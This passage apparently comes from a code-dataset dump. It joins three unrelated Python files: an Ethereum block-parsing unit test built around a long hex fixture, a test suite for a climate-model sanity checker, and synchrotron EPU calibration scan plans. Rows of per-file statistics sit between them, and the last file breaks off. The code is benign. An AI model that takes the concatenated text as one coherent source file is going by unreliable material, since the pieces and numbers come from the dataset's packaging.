57b52e17215478338dadb917de16b80c4eb5fa3cd7c631ecc0a74aae6cde2f9016b128511b1f3f8008302380a947a250d5630b4cf539739df2c5dacb4c659f2488d80b9010418cbafe5000000000000000000000000000000000000000000f8277896582678ac0000000000000000000000000000000000000000000000000000000252eadbac7f203d00000000000000000000000000000000000000000000000000000000000000a00000000000000000000000007030721ceda62ee474aa4bbfea588324cddf406a00000000000000000000000000000000000000000000000000000000608394df000000000000000000000000000000000000000000000000000000000000000200000000000000000000000095ad61b0a150d79219dcf64e1e6cc01f0b64c4ce000000000000000000000000c02aaa39b223fe8d0a0e5c4f27ead9083c756cc225a0d1f4f019c33c1f599b0ece753077b51ded1bbd201e5aac9d8c9ccfbc4d5d7249a06bf31de2923eb50fed71403124d5898bf95ff5c716be3f4156c7f0c791e65c37f8aa098511b1f3f8008301313594514910771af9ca656af840dff83e8264ecf986ca80b844a9059cbb000000000000000000000000d94449ca1d6b50569f18a644bec301286ffaf8c60000000000000000000000000000000000000000000000e89cc13ba022a6000026a0ada20e88be85f83226e5016189cd4c60fe2bf850e37b460e9fa68f0e7dde0007a0670192504d3b9e12d259ccf80eca86a081c3afa733d5559a788ac0df1c1b1d4bf889178511b1f3f8008301741e940822f3c03dcc24d200aff33493dc08d0e1f274a280a450ce4109000000000000000000000000000000000000000000000000000000008132d13826a0fa06ad05504430599768b4257c332c3d2b1cb052be826ccdafb1e1949373e797a0137caaa18af38f78af7e460bdba07ee7fab9071bfae4318ee8c3254e7fe2aa84f9018b188511abfe17008302a5d3947a250d5630b4cf539739df2c5dacb4c659f2488d80b9012438ed17390000000000000000000000000000000000000000000000001bc16d674ec80000000000000000000000000000000000000000000000000036e648d177d88369f700000000000000000000000000000000000000000000000000000000000000a0000000000000000000000000cc601e02c67873216cd2ed8c0d6b7e202c67d73b000000000000000000000000000000000000000000000000000000006083950d0000000000000000000000000000000000000000000000000000000000000003000000000000000000000000c00e94cb662c3520282e6f5717214004a7f26888000000000000000000000000c02aaa39b223fe8d0a0e5c4f27ead9083c756cc20000000000000000000000001337def16f9b486faed0293eb623dc8395dfe46a25a0ccd35769e79a5bab22086642f72f991971d1e84992bc4f9e78a74b5a786f6b9ba07bab7f30fd8c5cb6bab0351863559050c15eb037670c9849e9ebacdf27a212eaf90152028511abfe17008301f5b2947a250d5630b4cf539739df2c5dacb4c659f2488d880ddd8c8889b68800b8e47ff36ab5000000000000000000000000000000000000000005b15397988168f06b7f75760000000000000000000000000000000000000000000000000000000000000080000000000000000000000000a4d030297867af32cdfd5a2f3361502a8aa3f1c500000000000000000000000000000000000000000000000000000000608394e50000000000000000000000000000000000000000000000000000000000000002000000000000000000000000c02aaa39b223fe8d0a0e5c4f27ead9083c756cc200000000000000000000000095ad61b0a150d79219dcf64e1e6cc01f0b64c4ce25a09f409a2858d67fbf30707e7143c245077595c67cedd64c3d214347b682e5db0fa05ed918afb6121dbb268b56b107934ab269a6dad3b0f6e6e278fa62d441f14d3df90152628511abfe170083022c4f947a250d5630b4cf539739df2c5dacb4c659f2488d8829a2241af62c0000b8e47ff36ab50000000000000000000000000000000000000000000015eb87536c94cc0ee2f40000000000000000000000000000000000000000000000000000000000000080000000000000000000000000d95a241be42015facef7aa57a1353a6e8dfb0201000000000000000000000000000000000000000000000000000000006083950d0000000000000000000000000000000000000000000000000000000000000002000000000000000000000000c02aaa39b223fe8d0a0e5c4f27ead9083c756cc20000000000000000000000000020d80229877b495d2bf3269a4c13f6f1e1b9d326a0e1d1a4c82eb62093bae909d256b02a5b6fb8023a58f7ac6d1732fed40d3a411ba02500caf1c4528d06262064e22ba53d309b2bb75874fc0d1a319bc46f67db68e9f9016c81ab8511abfe170083029f0d947a250d5630b4cf539739df2c5dacb4c659f2488d80b90104791ac94700000000000000000000000000000000000000000000000005303a34ec0e0f9f000000000000000000000000000000000000000000000000016e026b1acb43c300000000000000000000000000000000000000000000000000000000000000a0000000000000000000000000841fc79443e3ae96b717c7acab9268da0722bf2a000000000000000000000000000000000000000000000000000000006083950d0000000000000000000000000000000000000000000000000000000000000002000000000000000000000000562607e00db2a515e007be902bbc94859fd782f3000000000000000000000000c02aaa39b223fe8d0a0e5c4f27ead9083c756cc226a0bb4e6c839277e41d499f0960d22d5ab6cb2cd62d839fdb3e8cfa405a5bed7c8ea059a6a7c10957fde85bf3d9121bbdb3e98506209ec628a5b489af1ed61b623619f86b2a851176592e0082520894d5ab902320e7857d2e7c6845ac54b88455b005ec87f8b0a10e4700008026a08e0da340932a8d01308297dd5bbc926dbe8fe221d04304492e7445ed0b7bf667a020bf1244cc15b99881dbb35adb6509788f1f78d6926bf9d6dfd7e8b91c4bab59f8a920851176592e0082c82694f3624e3692fdf95ded5a97d6cca9963f05a4181d80b844095ea7b30000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488dffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff25a01b4fdb356620c640e05d5b51e2988c45bc8a502e8b6a0bd0dd2af566bd73eebba05e28ed0a77ecbc5291f608e6e46a99da61e70fba45cb77f26d4fbfe644bf20ddf9016d8205d6851176592e008302b7c9947a250d5630b4cf539739df2c5dacb4c659f2488d80b9010418cbafe50000000000000000000000000000000000000000000000010a30cd418bd9dd1d00000000000000000000000000000000000000000000000005b4271f534b9c6300000000000000000000000000000000000000000000000000000000000000a000000000000000000000000076f994dbeb2f3b9e77522b800b8b6fa42e5c224c00000000000000000000000000000000000000000000000000000000608390d500000000000000000000000000000000000000000000000000000000000000020000000000000000000000004cd647a09a7198fab0e6e85442732479e3be7ab9000000000000000000000000c02aaa39b223fe8d0a0e5c4f27ead9083c756cc226a0fa3d2cd53d8042da83b18f5e75cd36e4baae2c825fb775eac331d7cacbc5c884a021b4411734994b0d30615b70bebc8401a41aaf3cdd529a0eb65d8e4c0b0426bdf9019729851176592e008302956c94def1c0ded9bec7f1a1670819833240f027b25eff88058d2c2cede31830b90128d9627aa40000000000000000000000000000000000000000000000000000000000000080000000000000000000000000000000000000000000000000058d2c2cede31830000000000000000000000000000000000000000000000001ce66002e20ebd81100000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000002000000000000000000000000eeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeee00000000000000000000000058b6a8a3302369daec383334672404ee733ab239869584cd000000000000000000000000c770eefad204b5180df6a14ee197d99d808ee52d0000000000000000000000000000000000000000000000f57ebf95fc6083907725a0f086b4ffc154553ac36ba6c88e335bb6966f38161cd7377c74e6602dd7fb857ea001cc19c5a73d5486ea33be49182c333d2e762dbe6269d1ec7b1e003d448d34b5f86e82015d851170fbe380825208944fed1fc4144c223ae3c1553be203cdfcbd38c58188015e270d90731d368026a01885a3d863db6f619c1404b7f90fdac7f60c7e19bdd4b8693e0a4fe87a7faac9a02bf90fab4ad7bb738a81a28914ccf2faf211b08f8e4a0181aee770558b77e419f9016b01851170fbe380830346b9947a250d5630b4cf539739df2c5dacb4c659f2488d80b9010418cbafe5000000000000000000000000000000000000000000021165458500521280000000000000000000000000000000000000000000000000000029e9b82b69ae6d7e00000000000000000000000000000000000000000000000000000000000000a0000000000000000000000000e2f549a36fc4f1d23c326550d60252b31b089a8600000000000000000000000000000000000000000000000000000000608397850000000000000000000000000000000000000000000000000000000000000002000000000000000000000000a15c7ebe1f07caf6bff097d8a589fb8ac49ae5b3000000000000000000000000c02aaa39b223fe8d0a0e5c4f27ead9083c756cc226a06bf66584d63de8558b326d66d2ced0e3fa66ae5416190bcbb778c0b75957770fa078dfb173300ebcd3454615ef20c33c879c211326aab5283820afca9f61ef7e1cf8aa819385113abe640082c82694f3624e3692fdf95ded5a97d6cca9963f05a4181d80b844095ea7b30000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488dffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff25a06a49829f02cf66aeb7e7ad2333a6f4b6ce28d6025327721519aacfb5f8ebc4bfa036597340428c77fa3bfe9be22fce6e237dcfdcc74a14b1a8723c51cd99008b24f8ac82560885110e562a6083012e8994a0cf46eb152656c7090e769916eb44a138aaa40680b844a9059cbb0000000000000000000000009440ede899f828bbdcd7c99bb9dd991582ed1a790000000000000000000000000000000000000000000000914878a8c05ee0000025a095c3b3bb2119923f033fb9d532d946940d53f47abdaf6f866ea4eb45226e9e5aa026f8fc62b9e0a6ac5a980b885d96d53cb124208153264953ca072047f7616adff86e8301aaef851105197b00825208940979299ed856d92a4232f7e48f7da93ca1d16f8a870f84e35ccc5f008026a0aba513e07b11f99999c6bd76c00950992141e63513d41465e0b29f9660421ff9a03d8609e47e5d862dddd909dd8c93c810365571df0ffc842ec1ffb699b0380096f8aa018510ff239a0083012e6194c02aaa39b223fe8d0a0e5c4f27ead9083c756cc280b844a9059cbb0000000000000000000000003fd66fbf6b814ef5d3fa4e2c57ca9dee117e121200000000000000000000000000000000000000000000000028736b1adbcfe70026a03bc9b52027af308a06282ba5010e920127f9ec5a7a7adca1dc0ae358354502a5a056eaf610400639e6ef7dde2532f487ab1fade556c98349bbd87d688193aee500f86d82872b8510ff239a00825208944818df800d41ac93e98dbb7e8421921ce850ba0f8719bd4a0365d0008025a076d7bce6c97a872145010ab3b7bde1c513e82b97c5f171ddccb0376bc348dcd7a005802d1dab69996aa4819930d026f3c5720c1a347fae82891c51f9cfe4eafbf6f8ab81858510e74c16008301314794514910771af9ca656af840dff83e8264ecf986ca80b844a9059cbb00000000000000000000000000f0ed33f6dcb803f7470b19ec52579430b9ed0600000000000000000000000000000000000000000000006cfc1c10cc4eef046326a04fca420bb50cd92c71bdda92e3768057ff6b215903ccc0dfe4e141874e500d6ea03b56dec695ced7875be92240ef3dccfbeeddb0f7003cefed9e4096db59288174f9016b098510e74c16008302531394d9e1ce17f2641f24ae83637ab66a2cca9c378b9f80b9010418cbafe5000000000000000000000000000000000000000000000004e5b8666dcb31edfd0000000000000000000000000000000000000000000000000089e710cdd3ead700000000000000000000000000000000000000000000000000000000000000a0000000000000000000000000afa34cb4c55bfa2162e17e586a4dc1ac02058dd600000000000000000000000000000000000000000000000000000000608394dc00000000000000000000000000000000000000000000000000000000000000020000000000000000000000006b175474e89094c44da98b954eedeac495271d0f000000000000000000000000c02aaa39b223fe8d0a0e5c4f27ead9083c756cc226a0c53378d928151c44cbfcbeedb27d5b4c0836119df02183b73ed3622c18a7d7b6a014ae074c31cd60a7ac860446d587fb31212cd777cf00d16ec69a49bfd5001503f8cc821a5d8510e74c160083030d4094bbc7f7a6aadac103769c66cbc69ab720f7f9eae380b86423b872dd000000000000000000000000a5b7be834c8ca2f4faf7d0731c400e23765bf579000000000000000000000000ad083571c58fb565b3848becd12b8a13395361e20000000000000000000000000000000000000000000006587f0ab171fb38c00025a04b3c0ed5cdadb7db2ea6c6fc68d51794b760579e7acca38dbf3d723ef33e1b83a02e74aaa5da65fa9b5b6c3063f99de8c38019ab5bfda2a03b9d56b47b01b12886f86c808510e74c160082c06f9419d29a0c0fc94d89b56f1155a4d7b84e39294155884e6a38409dbe4f608025a0a1550c37ddc83567d1cd164c89eb4416ca945fb1ffb9c331494c721fe2ed930ea07c6ad3b4b9050bd81142b8c2fbe1c041dda41f738339a1bc6e670136611ed4b0f88b82022b8510c9d222148301ea2f9499896ba5fde6ced06569cf848982d2c7779d269480a487e3c599000000000000000000000000000000000000000000000000000000000000118c25a01d5fcbe9edcd7035ae2a2747e506435d252ea6f1600ef143606023a5ccbe97eca02271b6b3226b8afce0493fd6937a37259101153144883f3ad656c2aeb66f54acf9015281ff8510c97eb1008307b8169437236cd05b34cc79d3715af2383e96dd7443dcf18711c37937e08000b8e4f5e5406300000000000000000000000001aac5236ad205ebbe4f6819bc64ef5bef40b71c000000000000000000000000000000000000000000000000000000003b9aca000000000000000000000000000000000000000000000000000000000000000060000000000000000000000000000000000000000000000000000000000000006000000000000000000000000000000000000000000000000000000000000419d900000000000000000000000000000000000000000000000000000000000419ed000000000000000000000000000000000000000000000000000000000000000025a0c52a41c09fa0d389843dea694458e7601d3e38ac17b60c43e0d0b8193ad91d84a072a051c5eab22ab934eeeee7958834821b2a63535c4f3d5fadc53209dfaf8344f86b138510c388d00082520894a49ecb7eeee9a44105947b8a7fd470f730d7ffc08706a66070cfc6008026a0f8309121401fc79c25f13240d129251f6a6830fe1e6bae341f793c33467ba967a06ea25857fec0a56ed159d8342d77f8aeb2f03044623248c015cd772a7c28e6d6f86b268510c388d0008252089477ff7adfeaf863d0aa891e923e9aba765414906387048a6280aa3a008026a0eeaf47c313135f7a7f7bb435456036696e8412dda3ca793fd48fe0c6d1be580ca038205f816eec2df72c93ba7859e1c2239857dede55e70e7225f45388e9aa5275f8a9128510c388d00082c85794a2b4c0af19cc16a6cfacce81f192b024d625817d80b844095ea7b30000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488dffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff26a08d14e7183d3f12f45da2e82064c18b80a183ab4a50f235ac49ea5e40be92d3b6a070f32e9bb077b40052b462f6f74102be4e067dd7b6d8eee26b21c8baec1363f4f90152808510c388d00083034f50947a250d5630b4cf539739df2c5dacb4c659f2488d8801c50d09c15ea800b8e47ff36ab500000000000000000000000000000000000000000000000f2194169dceda59700000000000000000000000000000000000000000000000000000000000000080000000000000000000000000bea2078e8ee9d89e394e29c73d1ce38da8ce41620000000000000000000000000000000000000000000000000000017901f592e20000000000000000000000000000000000000000000000000000000000000002000000000000000000000000c02aaa39b223fe8d0a0e5c4f27ead9083c756cc20000000000000000000000006b175474e89094c44da98b954eedeac495271d0f25a074a2c82cdef3fa611b93aeb730d2d696ba9797601f6978b084067578336cfb86a0164a450f297a9f8af6ca67813f49425ed50c84f1d5bc8d6953fdc42d9e5f0f2df8a9298510c388d00082c806943301ee63fb29f863f2333bd4466acb46cd8323e680b844095ea7b30000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488dffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff26a05a188c9d45e1703749b9dab6ba0a11627aea3d23bff54abff26209078a81ef18a0579e4b84f0544d1b33901a1408ec7b6561475e45a8cd63031eab94b6cd3c2a14f86e8232a08510c388d00083015f90943022fde28e60114ca149071bd3a3f345fb322711870df436973ce4008025a0dadbe4cdd43a16248d22af5eac25e6a98bed3bd123898ef6269f6566aeb123f7a07aa9a41a5bafd1217aba952e88b57727acc81c62c7b0995ce95a6c5fb0453ae1f901ae8305b6ec8510c388d00083034dc594d1669ac6044269b59fa12c5822439f609ca54f4180b901440dcd7a6c00000000000000000000000019fff3bf8c404f1ddaa2e464463f69bd785358c200000000000000000000000000000000000000000000000000000000eb31a7e0000000000000000000000000dac17f958d2ee523a2206206994597c13d831ec700000000000000000000000000000000000000000000000000000000608ccae1000000000000000000000000000000000000000000000000000000000007a36600000000000000000000000000000000000000000000000000000000000000c00000000000000000000000000000000000000000000000000000000000000041230a4ac01983b244d2be0fec4885b47c2c28135727061b8472be1248b08dbe2c798e63ccde67b00ed0bd819f0402e19655826ec3964e3b01b3e8c5e062d572261c000000000000000000000000000000000000000000000000000000000000001ca037e6a9e109a5fd7a9fcfcec86a0fa8c63c6328dd1dc004bfe30598fef8d91f7da0582627f0738c21340a420663d3f0ee60b1ad6f207129591d8bc64e377b8e8235f901ae8305b6ed8510c388d00083034db994d1669ac6044269b59fa12c5822439f609ca54f4180b901440dcd7a6c000000000000000000000000d0e2dbe16d6cadc55f032ac325d1f4d6e927c2f4000000000000000000000000000000000000000000000000000000004190ab00000000000000000000000000dac17f958d2ee523a2206206994597c13d831ec700000000000000000000000000000000000000000000000000000000608ccae3000000000000000000000000000000000000000000000000000000000007a36700000000000000000000000000000000000000000000000000000000000000c00000000000000000000000000000000000000000000000000000000000000041d33cff666a85d38ab54babe820b3e602fe4a745564d68f2994c870c50ed0cb907f5f4d24d339acab428445af5736bb6f3363cab2ba3af627126f7b153de772701b000000000000000000000000000000000000000000000000000000000000001ba07996df97c5a59dfe6351b1077e6832647d9d3d09e0775870a9c865a7ee9db4baa03ad71e8b981be90726ff2c1c34fae3e054689765039bd823b9744b4429745bf1f86b018510a1798124825208946fbae3ec8bf83d877c08bf078d0b87c25edadffa8709f295cd5f1b578025a060a0e999f8524a4f81a87e1dd43960880572598678390d42fc951196d9b3cc31a0143c72a08366f1482bca12048ccb2ca6cb389c1136a98fc158a351f8b20a449df86b028510a1798124825208946fbae3ec8bf83d877c08bf078d0b87c25edadffa870f21cf8f7de8018026a080330076b080346ae155f7046495036fcfc0172e882723868d7b335ff5b12a70a063b44999d471dd99c9110d98e471a59988049f6d2174f5c6f15c8a5eaab6a169f86b018510a1798124825208946fbae3ec8bf83d877c08bf078d0b87c25edadffa8709f295cd5f1b578025a0c5fd6fbf175e557c916088fa289d860ff5704796c1dc2c06e669f8996de89920a04fa529e03dcb662feb499ba2ee743910d787d9bc30c46b21b46212714a739c5af86b018510a1798124825208946fbae3ec8bf83d877c08bf078d0b87c25edadffa8709f295cd5f1b578026a07d01be687de6441d1c967aaceeb5c7f8b73f5df575d10558569ad3ab7de0ac76a00f7a9c80861395c601835a08919a54045e371d45584b690c3dd819944cc5f7cdf86b028510a1798124825208946fbae3ec8bf83d877c08bf078d0b87c25edadffa8709f295cd5f1b578026a0bca0cb0d37795c8ce10a588d346128ab82ec3a945ce66e7156218226bfec2cdaa0627d7ae2a734abe6d73e595bb8fbd7a403b9cda614c4104990f681cb879b36f6f90218f90215a06acde3d3a26aa1192eac36eae2e505da2b8026b14675c5e91178850fe4d1973aa01dcc4de8dec75d7aab85b567b6ccd41ad312451b948a7413f0a142fd40d4934794ea674fdde714fd979de3edf0f56aa9716b898ec8a011aa238c96c84ead25e422a352b56a62f6849f6cb5a42e5d32cc473079125738a0b32b074e75dd1fc100ba9937ebd313952524745dd88d8d54979a140818ee3cb5a0df7a875023b9e05aa07d2a3a25a55a4cbf7a5066901f078fe399f09ca434572eb9010002f0e14d601a70bd90020ea3d6211ac4791c9624ca963d842879908748a00c69549d8d4b11870cd0b853d945016009da6310c02d0879de58f2d0d3f211a890427ac1d2830bc7ea2b6c7f90e833fd6ee6fcd01704c1d85b1b806af628823690883aac4644e77efa381585c8171f72aa605e42386917325ed2c86246d531043139adcec5920ac823ac3055040bd1205084b82585f38b2a9418fa6a206722daae6306d70948b54724b44e1742a09f7664235b2b824900954e03287257001f18e8452c55ad924de4e0cb0d1b5984ca4104dd2dd4934b594f80b01e0c31ba18d264f92274e23eaa4b0481404880f3029122a366e43e3581a6b14120c7d52590f2312b87182282e4ca07f683bbb0d683e4c37283e476e884608390629465746865726d696e652d617369612d6561737432a0bdd4944795488cc326db18ad9e73d8d4f294a0335e687ec5a1bc171708e32a6488f058a9cbbd0789598a0504ace7ef771bc094b7"
msg_block_bytes = convert.hex_to_bytes(msg_block_str)
msg = NewBlockEthProtocolMessage(msg_block_bytes)
self.assertEqual(12300503, msg.number())
self.assertEqual(1619234938, msg.timestamp())
self.assertEqual("675c38a69645a47c8c81495a65c2903c044e1300283f8bad065987e8b3065b22", msg.block_hash().to_string())
self.assertEqual(23698078580832053793975, msg.get_chain_difficulty())
block_header = bytearray(msg.block_header())
block_header_rlp = rlp.decode(block_header, BlockHeader)
self.assertEqual(12300503, block_header_rlp.number)
self.assertEqual(1619234938, block_header_rlp.timestamp)
self.assertEqual("675c38a69645a47c8c81495a65c2903c044e1300283f8bad065987e8b3065b22", Sha256Hash(block_header_rlp.hash()).to_string())
| 1,203.707965
| 131,108
| 0.990509
| 563
| 136,019
| 238.973357
| 0.243339
| 0.000832
| 0.000803
| 0.000684
| 0.007143
| 0.006184
| 0.005768
| 0.005768
| 0.005143
| 0.004645
| 0
| 0.724275
| 0.006874
| 136,019
| 112
| 131,109
| 1,214.455357
| 0.271712
| 0
| 0
| 0.178947
| 0
| 0
| 0.964792
| 0.964645
| 0
| 1
| 0
| 0
| 0.105263
| 1
| 0.063158
| false
| 0
| 0.2
| 0
| 0.284211
| 0
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
c230da5fa7ff00e04c795146241c6227864dd81b
| 3,635
|
py
|
Python
|
testsuite/test_welch_run.py
|
C2SM/clim-sanity-checker
|
3d5d610b16ca7e87c841ef7ad06a94d0399b4773
|
[
"MIT"
] | null | null | null |
testsuite/test_welch_run.py
|
C2SM/clim-sanity-checker
|
3d5d610b16ca7e87c841ef7ad06a94d0399b4773
|
[
"MIT"
] | 3
|
2021-07-29T11:26:20.000Z
|
2021-07-29T16:01:54.000Z
|
testsuite/test_welch_run.py
|
C2SM/clim-sanity-checker
|
3d5d610b16ca7e87c841ef7ad06a94d0399b4773
|
[
"MIT"
] | null | null | null |
import shutil
import testsuite.utils as utils
def test_welch_first_ref():
input_dir = 'testsuite/data'
exp_name = 'first-ref'
files_generated = utils.generate_data(input_dir,
exp_name,
'2d_A',
'TSURF')
files_generated.extend(utils.generate_data(input_dir,
exp_name,
'2d_B',
'T2M'))
cmd = 'python paths_init.py -pr {} -ts'.format(input_dir)
status, _ = utils.shell_cmd(cmd)
assert status == 0, 'paths_init.py failed'
ref_dir = 'testsuite/first_ref'
shutil.rmtree(ref_dir, ignore_errors=True)
cmd = 'python sanity_test.py -e {} -t welch --spinup 0 \
--p_stages testsuite/stages \
--wrkdir testsuite/workdir \
--p_ref_csv_files {} --f_vars_to_extract \
vars_welchs_test.csv -c -ts'.format(exp_name, ref_dir)
status, _ = utils.shell_cmd(cmd)
utils.delete_data(files_generated)
assert status == 0, 'sanity_test.py failed'
def test_welch_embed():
input_dir = 'testsuite/data'
exp_name = 'run_embed'
files_generated = utils.generate_data(input_dir,
exp_name,
'2d_A',
'TSURF')
files_generated.extend(utils.generate_data(input_dir,
exp_name,
'2d_B',
'T2M'))
cmd = 'python paths_init.py -pr {} -ts'.format(input_dir)
status, _ = utils.shell_cmd(cmd)
assert status == 0, 'paths_init.py failed'
cmd = 'python sanity_test.py -e {} -t welch --spinup 0 \
--p_stages testsuite/stages \
--wrkdir testsuite/workdir \
--p_ref_csv_files testsuite/ref --f_vars_to_extract \
vars_welchs_test.csv -c -ts'.format(exp_name)
status, _ = utils.shell_cmd(cmd)
utils.delete_data(files_generated)
assert status == 0, 'sanity_test.py failed'
def test_welch_chained():
input_dir = 'testsuite/data'
exp_name = 'run_chained'
files_generated = utils.generate_data(input_dir,
exp_name,
'2d_A',
'TSURF')
files_generated.extend(utils.generate_data(input_dir,
exp_name,
'2d_B',
'T2M'))
cmd = 'python paths_init.py -pr {} -ts'.format(input_dir)
status, _ = utils.shell_cmd(cmd)
assert status == 0, 'paths_init.py failed'
cmd = 'python process_data.py -e {} -t welch --spinup 0 \
--p_stages testsuite/stages \
--wrkdir testsuite/workdir \
--f_vars_to_extract vars_welchs_test.csv \
-c'.format(exp_name)
status, _ = utils.shell_cmd(cmd)
assert status == 0, 'process_data.py failed'
cmd = 'python perform_test.py -e {} -t welch \
--p_stages testsuite/stages \
--wrkdir testsuite/workdir \
--p_ref_csv_files testsuite/ref --f_vars_to_extract \
vars_welchs_test.csv -ts'.format(exp_name)
status, _ = utils.shell_cmd(cmd)
utils.delete_data(files_generated)
assert status == 0, 'perform_test.py failed'
| 33.045455
| 66
| 0.510316
| 394
| 3,635
| 4.393401
| 0.15736
| 0.052571
| 0.064702
| 0.076834
| 0.875217
| 0.867707
| 0.849798
| 0.81398
| 0.786251
| 0.767764
| 0
| 0.008613
| 0.393122
| 3,635
| 109
| 67
| 33.348624
| 0.776065
| 0
| 0
| 0.74026
| 1
| 0
| 0.103714
| 0
| 0
| 0
| 0
| 0
| 0.090909
| 1
| 0.038961
| false
| 0
| 0.025974
| 0
| 0.064935
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
c238ef60c05473ff43637530349512c5d6f2b36a
| 11,394
|
py
|
Python
|
plans/epu-cal-plan.py
|
mrakitin/profile_collection-six
|
20e41632b9898ac83a8e60fcca9b8aeaaa91f0ad
|
[
"BSD-3-Clause"
] | null | null | null |
plans/epu-cal-plan.py
|
mrakitin/profile_collection-six
|
20e41632b9898ac83a8e60fcca9b8aeaaa91f0ad
|
[
"BSD-3-Clause"
] | 30
|
2017-05-18T19:11:24.000Z
|
2021-06-23T16:59:26.000Z
|
plans/epu-cal-plan.py
|
mrakitin/profile_collection-six
|
20e41632b9898ac83a8e60fcca9b8aeaaa91f0ad
|
[
"BSD-3-Clause"
] | 3
|
2018-01-10T17:16:47.000Z
|
2020-03-12T14:51:36.000Z
|
def epu_calib_gr1800_Aug2019(dets = [sclr, ring_curr]):
print('\n\n WARNING WARNING WARNING:\n\t check if there scalar is installed or not!!!!')
yield from gcdiag.diode
# srs settings for diode = SRS settings: 5 x1 uA/v , time = 1.0
yield from mv(m1_simple_fbk,0)
yield from mv(m3_simple_fbk,0)
# PHASE = 0 mm
yield from mv(epu1.phase, 0)
yield from mv(epu1.table,1)
yield from sleep(30)
#yield from mv(feslt.hg,2.0)
#yield from mv(feslt.vg,2.0)
#yield from bp.mv(pgm.cff,5.2707)
for i in range(250,1351,50):
yield from mv(pgm.en,i)
yield from sleep(5)
start_gap = epu1.gap.readback.value
yield from mv(epu1.gap,start_gap-1.5)
yield from sleep(10)
yield from rel_scan(dets, epu1.gap,0,3,31)
yield from mv(epu1.gap, peaks['max']['sclr_channels_chan2'][0] -1)
yield from sleep(10)
yield from rel_scan(dets, epu1.gap,0,2,101)
# PHASE = 28.5 mm
yield from mv(epu1.phase, 28.5)
yield from mv(epu1.table,3)
yield from sleep(30)
yield from mv(pgm.en,850)
yield from beamline_align_v2()
yield from mv(m1_simple_fbk,0)
yield from mv(m3_simple_fbk,0)
yield from mv(pgm.en,350)
yield from sleep(5)
yield from mv(epu1.gap,18.01)
yield from sleep(10)
yield from rel_scan(dets, epu1.gap,0,2,31)
yield from mv(epu1.gap, 18.01)
yield from sleep(10)
yield from rel_scan(dets, epu1.gap,0,1,51)
for i in range(400,1351,50):
yield from mv(pgm.en,i)
yield from sleep(5)
start_gap = epu1.gap.readback.value
yield from mv(epu1.gap,start_gap-1)
yield from sleep(10)
yield from rel_scan(dets, epu1.gap,0,2,31)
yield from mv(epu1.gap, peaks['max']['sclr_channels_chan2'][0] -1)
yield from sleep(10)
yield from rel_scan(dets, epu1.gap,0,2,101)
# LEAVING THE BEAMLINE READY FOR NEXT TEST
yield from mv(epu1.phase, 0)
yield from mv(epu1.table,1)
yield from sleep(30)
yield from mv(pgm.en,530)
yield from beamline_align_v2()
def epu_calib_gr500(dets = [sclr, ring_curr]):
print('\n\n WARNING WARNING WARNING:\n\t check if there scalar is installed or not!!!!')
print('\n\n WARNING WARNING WARNING:\n\t this assumes epu interpolation table is DISABLED!!!!')
yield from gcdiag.diode
# srs settings for diode = SRS settings: 5 x10 uA/v , time = 1.0
#yield from mv(feslt.hg,2.0)
#yield from mv(feslt.vg,2.0)
#yield from bp.mv(pgm.cff,2.32)
yield from mv(extslt.hg,300)
yield from mv(extslt.vg,30)
#180 eV
yield from mv(pgm.en,180)
yield from mv(epu1.gap, 18.01)
yield from sleep(10)
yield from rel_scan(dets,epu1.gap,0,1.5,76)
yield from mv(epu1.gap, 18.01)
yield from sleep(10)
yield from rel_scan(dets, epu1.gap,0,1.5,76)
for i in range(200,1351,50):
calc_gap=e2g(i)
yield from mv(pgm.en,i)
yield from sleep(5)
yield from mv(epu1.gap,calc_gap-2)
yield from sleep(10)
yield from rel_scan(dets, epu1.gap,0,6,31)
yield from mv(epu1.gap, peaks['max']['sclr_channels_chan2'][0] -1)
yield from sleep(10)
yield from rel_scan(dets, epu1.gap,0,2,101)
yield from sleep(100)
#800-1600 eV, 3rd harmonic
for i in range(800,1601,50):
calc_gap=e2g(i/3)
yield from mv(pgm.en,i)
yield from sleep(5)
yield from mv(epu1.gap,calc_gap-2)
yield from sleep(10)
yield from rel_scan(dets, epu1.gap,0,4,41)
yield from mv(epu1.gap, peaks['max']['sclr_channels_chan2'][0]-0.5)
yield from sleep(10)
yield from rel_scan(dets, epu1.gap,0,1.0,76)
calc_gap=e2g(850)
yield from mv(pgm.en,850)
yield from sleep(5)
yield from mv(epu1.gap,39.387)
yield from mv(shutterb,'close')
print('\n\n WARNING WARNING WARNING:\n\t EPU Table/Interpolation disabled!!!!')
print('\n\n WARNING WARNING WARNING:\n\t M1 Feedback disabled!!!!')
def epu_calib_gr1800(dets = [sclr, ring_curr]):
print('\n\n WARNING WARNING WARNING:\n\t check if there scalar is installed or not!!!!')
print('\n\n WARNING WARNING WARNING:\n\t this assumes epu interpolation table is DISABLED!!!!')
yield from gcdiag.diode
# srs settings for diode = SRS settings: 5 x1 uA/v , time = 1.0
yield from mv(epu1.phase, 0)
#yield from mv(feslt.hg,2.0)
#yield from mv(feslt.vg,2.0)
#yield from bp.mv(pgm.cff,5.2707)
for i in range(250,1351,50):
calc_gap=e2g(i)
yield from mv(pgm.en,i)
yield from sleep(5)
yield from mv(epu1.gap,calc_gap-2)
yield from sleep(10)
yield from rel_scan(dets, epu1.gap,0,6,31)
yield from mv(epu1.gap, peaks['max']['sclr_channels_chan2'][0] -1)
yield from sleep(10)
yield from rel_scan(dets, epu1.gap,0,2,101)
yield from sleep(100)
#800-1550 eV, 3rd harmonic
